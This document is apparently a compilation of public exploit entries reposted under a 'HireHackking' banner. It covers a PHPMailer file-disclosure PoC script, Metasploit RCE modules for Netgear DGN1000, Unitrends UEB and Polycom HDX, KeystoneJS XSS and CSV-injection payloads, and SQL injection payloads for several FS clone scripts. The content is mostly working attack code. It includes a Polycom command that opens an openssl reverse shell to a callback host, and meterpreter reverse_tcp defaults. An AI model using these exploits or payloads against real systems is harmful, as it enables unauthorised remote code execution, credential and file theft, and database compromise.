// vulnerable form example //

<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "admin@localhost";
$mail->AddAddress($address, "root");
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail->MsgHTML($_POST["your-message"]);
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
<p><input type="submit" value="submit" /></p>

// exploit //

Put <img src="/etc/passwd"> in the message (or other file to disclose).

// python code //

#!/usr/bin/python
import urllib
import urllib2
 
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
 
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html
HireHackking 
Exploit-CVE-2017-6008

The CVE-2017-6008 is a vulnerability in the HitmanPro scan that allows privilege escalation by exploiting a kernel pool buffer overflow. The exploits here use the Quota Process Pointer Overwrite attack as described in the Tarjei Mandt's paper

Also, the exploits use my Pool sprayer library

You can find a detailed paper on the Windows 7 exploit here: 
https://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/

Windows 10 version

This version use another vulnerability in the hitmanpro37.sys driver, an Out-Of-Bounds read, which we use to leak the Pool Cookie. This leak allows us to use the very same attack on Windows 10.

You can find a detailed paper of the exploit on Windows 10 here (coming soon):
https://trackwatch.com/


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43057.zip
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated OS command execution vulneralbility
        in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
        DGN2000v1 models.
        },
      'Author' => [
        'Mumbai <https://github.com/realoriginal>', # module
        'Robort Palerie <roberto@greyhats.it>' # vuln discovery
      ],
      'References' => [
          ['EDB', '25978'],
      ],
      'DisclosureDate' => 'Jun 5 2013',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
      },
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET'
        })
      if res && res.headers['WWW-Authenticate']
        auth = res.headers['WWW-Authenticate']
        if auth =~ /DGN1000/
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Connecting to target...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
    end

    print_status("#{peer} - Exploiting target ....")
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200,
      :concat_operator => " && "
    )
  end

  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET',
        'vars_get' => {
          'next_file' => 'netgear.cfg',
          'todo' => 'syscmd',
          'cmd' => cmd.to_s,
          'curpath' => '/',
          'currentsetting.htm' => '1'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
HireHackking 
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated Stored XSS
# Vendor Homepage: http://keystonejs.com/
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: WEBAPPS
# Platform: Node.js
# CVE: CVE-2017-15878

Vendor Description:

KeystoneJS is a powerful Node.js content management system and web app
framework built on express and mongoose. Keystone makes it easy to create
sophisticated web sites and apps, and comes with a beautiful auto-generated
Admin UI.
Source: https://github.com/keystonejs/keystone/blob/master/README.md

Technical Details and Exploitation:

A cross-site scripting (XSS) vulnerability exists in
fields/types/markdown/MarkdownType.js in KeystoneJS before 4.0.0-beta.7 via
the Contact Us feature.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15878

Proof of Concept:

1. Navigate to Contact Us page
2. Fill in the details needed and enter the below payload in message field
and send
<a onmouseover=alert(document.cookie)>XSS link</a>
3. Now login as admin and navigate to the above new record created in the
enquiries
4. Move the cursor on the text “XSS link”

Solution:

The issues have been fixed and the vendor has released the patches

https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996f8a4aa35baa6b2bac

Reference:

https://github.com/keystonejs/keystone/pull/4478
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
HireHackking 
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated CSV Injection
# Vendor Homepage: http://keystonejs.com/
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: WEBAPPS
# Platform: Node.js
# CVE: CVE-2017-15879

Vendor Description:

KeystoneJS is a powerful Node.js content management system and web app
framework built on express and mongoose. Keystone makes it easy to create
sophisticated web sites and apps, and comes with a beautiful auto-generated
Admin UI.
Source: https://github.com/keystonejs/keystone/blob/master/README.md

Technical Details and Exploitation:

CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS
before 4.0.0-beta.7 via a value that is mishandled in a CSV export.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15879

Proof of Concept:

1.Go to Contact Us page and insert the below payload in the Name Field.
Payload: @SUM(1+1)*cmd|' /C calc'!A0
2. Login as Admin
3. Now Navigate to Enquiries page and check the entered payload.
4. Download as .csv, once done open it in excel and observe that calculator
application gets open.


Solution:

The issues have been fixed and the vendor has released the patches
https://github.com/keystonejs/keystone/pull/4478/commits/1b791d55839ebf434e104cc9936ccb8c29019231

Reference:

https://github.com/keystonejs/keystone/pull/4478
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf

-- 
Best Regards,
Ishaq Mohammed
https://about.me/security-prince
HireHackking 
# Exploit Title: FS Crowdfunding Script - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/crowdfunding-script/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-24

Product & Service Introduction:
===============================
Fortune Crowdfunding Script is a popular crowdfunding script developed in jQuery, PHP and MySQL.

Technical Details & Description:
================================

SQL injection on [id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/page_running_projects_details.php?id=11' AND 5391=5391 AND 'Qkwz'='Qkwz

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
    
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: FS Realtor Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/realtor-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-24

Product & Service Introduction:
===============================
The realtor business anywhere is dependent essentially on the support provided by a robust digital platform offering diverse solutions at fingertips.

Technical Details & Description:
================================

SQL injection on [id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/property_detail.php?id=29 AND 4599=4599

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=29 AND 4599=4599

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=29 AND SLEEP(5)
    
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: FS Care Clone - 'sitterService' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/care-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-24

Product & Service Introduction:
===============================
This product brings the most ideal solution to launch a portal dealing with every aspect of hiring care in a hasslefree manner.

Technical Details & Description:
================================

SQL injection on [sitterService] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/searchJob.php?sitterService=1' AND 2728=2728 AND 'fhir'='fhir

Parameter: sitterService (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sitterService=1' AND 2728=2728 AND 'fhir'='fhir
    
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: FS Monster Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/monster-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-24

Product & Service Introduction:
===============================
A highly sought after W3 compliant web solution standing out tall with a host of exciting features packed in. 

Technical Details & Description:
================================

SQL injection on [id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/Job_Details.php?id=6 AND 9364=9364

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 9364=9364
    
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: FS Trademe Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/trademe-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-24

Product & Service Introduction:
===============================
This is possibly the only software solution to facilitate launching of a portal with features like auction, eCommerce, B2B, Real Estate, Job Portal and classifieds all in one similar to Trademe.

Technical Details & Description:
================================

SQL injection on [id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/property_details.php?id=12 AND 3616=3616

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12 AND 3616=3616
    
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unitrends UEB bpserverd authentication bypass RCE',
      'Description'    => %q{
       It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
       has an issue in which its authentication can be bypassed.  A remote attacker could use this
       issue to execute arbitrary commands with root privilege on the target system.
      },
      'Author'         =>
        [
          'Jared Arave',  # @iotennui
          'Cale Smith',   # @0xC413
          'Benny Husted'  # @BennyHusted
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch' => [ARCH_X86],
      'CmdStagerFlavor' => [ 'printf' ],
      'References'     =>
        [
          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
          ['CVE', '2017-12477'],
        ],
      'Targets'        =>
        [
          [ 'UEB 9.*', { } ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => {
          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
          'SSL' => false
        },
      'DisclosureDate'  => 'Aug 8 2017',
      'DefaultTarget'   => 0))
    register_options([
        Opt::RPORT(1743)
      ])
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    s1 = connect(global = false)
    buf1  = s1.get_once(-1).to_s
    #parse out the bpd port returned
    bpd_port = buf1[-8..-3].to_i

    #check if it's a valid port number (1-65534)
    if bpd_port && bpd_port >= 1 && bpd_port <= 65535
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  def execute_command(cmd, opts = {})

    #append a comment, ignore everything after our cmd
    cmd = cmd + " #"

    # build the attack buffer...
    command_len = cmd.length + 3
    packet_len = cmd.length + 23
    data =  "\xa5\x52\x00\x2d"
    data << "\x00\x00\x00"
    data << packet_len
    data << "\x00\x00\x00"
    data << "\x01"
    data << "\x00\x00\x00"
    data << "\x4c"
    data << "\x00\x00\x00"
    data << command_len
    data << cmd
    data << "\x00\x00\x00"

    begin
      print_status("Connecting to xinetd for bpd port...")
      s1 = connect(global = false)
      buf1  = s1.get_once(-1).to_s

      #parse out the bpd port returned, we will connect back on this port to send our cmd
      bpd_port = buf1[-8..-3].to_i

      print_good("bpd port recieved: #{bpd_port}")
      vprint_status("Connecting to #{bpd_port}")

      s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
      vprint_good('Connected!')

      print_status('Sending command buffer to xinetd')

      s1.put(data)
      s2.get_once(-1,1).to_s

      disconnect(s1)
      disconnect(s2)

    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
    end

  end

  def exploit
    print_status("#{peer} - pwn'ng ueb 9....")
    execute_cmdstager(:linemax => 200)
  end
end
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'Polycom Command Shell Authorization Bypass',
        'Alias'           => 'polycom_hdx_auth_bypass',
        'Author'          =>
          [
            'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
            'h00die <mike@shorebreaksecurity.com>',         # submission/cleanup
          ],
        'DisclosureDate'  => 'Jan 18 2013',
        'Description'     => %q(
          The login component of the Polycom Command Shell on Polycom HDX
          video endpoints, running software versions 3.0.5 and earlier,
          is vulnerable to an authorization bypass when simultaneous
          connections are made to the service, allowing remote network
          attackers to gain access to a sandboxed telnet prompt without
          authentication. Versions prior to 3.0.4 contain OS command
          injection in the ping command which can be used to execute
          arbitrary commands as root.
          ),
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
            [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
            [ 'EDB', '24494']
          ],
        'Platform'    => 'unix',
        'Arch'        => ARCH_CMD,
        'Privileged'  => true,
        'Targets'     => [ [ "Universal", {} ] ],
        'Payload'     =>
        {
          'Space'        => 8000,
          'DisableNops'  => true,
          'Compat'       => { 'PayloadType' => 'cmd' }
        },
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
        'DefaultTarget'  => 0
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ], self.class
    )
    register_advanced_options(
      [
        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
      ], self.class
    )
  end

  def check
    connect
    sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
    Rex.sleep(1)
    res = sock.get_once
    disconnect

    if !res && !res.empty?
      return Exploit::CheckCode::Safe
    end

    if res =~ /Welcome to ViewStation/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # Keep track of results (successful connections)
    results = []

    # Random string for password
    password = Rex::Text.rand_text_alpha(rand(5) + 1)

    # Threaded login checker
    max_threads = datastore['THREADS']
    cur_threads = []

    # Try up to 100 times just to be sure
    queue = [*(1..datastore['MAX_CONNECTIONS'])]

    print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
    until queue.empty?
      while cur_threads.length < max_threads

        # We can stop if we get a valid login
        break unless results.empty?

        # keep track of how many attempts we've made
        item = queue.shift

        # We can stop if we reach max tries
        break unless item

        t = Thread.new(item) do |count|
          sock = connect
          sock.put(password + "\n")
          res = sock.get_once

          until res.empty?
            break unless results.empty?

            # Post-login Polycom banner means success
            if res =~ /Polycom/
              results << sock
              break
            # bind error indicates bypass is working
            elsif res =~ /bind/
              sock.put(password + "\n")
            # Login error means we need to disconnect
            elsif res =~ /failed/
              break
            # To many connections means we need to disconnect
            elsif res =~ /Error/
              break
            end
            res = sock.get_once
          end
        end

        cur_threads << t
      end

      # We can stop if we get a valid login
      break unless results.empty?

      # Add to a list of dead threads if we're finished
      cur_threads.each_index do |ti|
        t = cur_threads[ti]
        unless t.alive?
          cur_threads[ti] = nil
        end
      end

      # Remove any dead threads from the set
      cur_threads.delete(nil)

      Rex.sleep(0.25)
    end

    # Clean up any remaining threads
    cur_threads.each { |sock| sock.kill }

    if !results.empty?
      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
      do_payload(results[0])
    else
      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
    end
  end

  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

    # Start a listener
    start_listener(true)

    # Figure out the port we picked
    cbport = self.service.getsockname[2]

    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
    sock.put(cmd)

    # Give time for our command to be queued and executed
    1.upto(5) do
      Rex.sleep(1)
      break if session_created?
    end
  end

  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end

  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   =>
      {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )

    self.service.on_client_connect_proc = proc { |client|
      stage_final_payload(client)
    }

    # Start the listening service
    self.service.start
  end

  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.is_a?(Rex::Service)
        if self.service.is_a?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end

  # Accessor for our TCP payload stager
  attr_accessor :service
end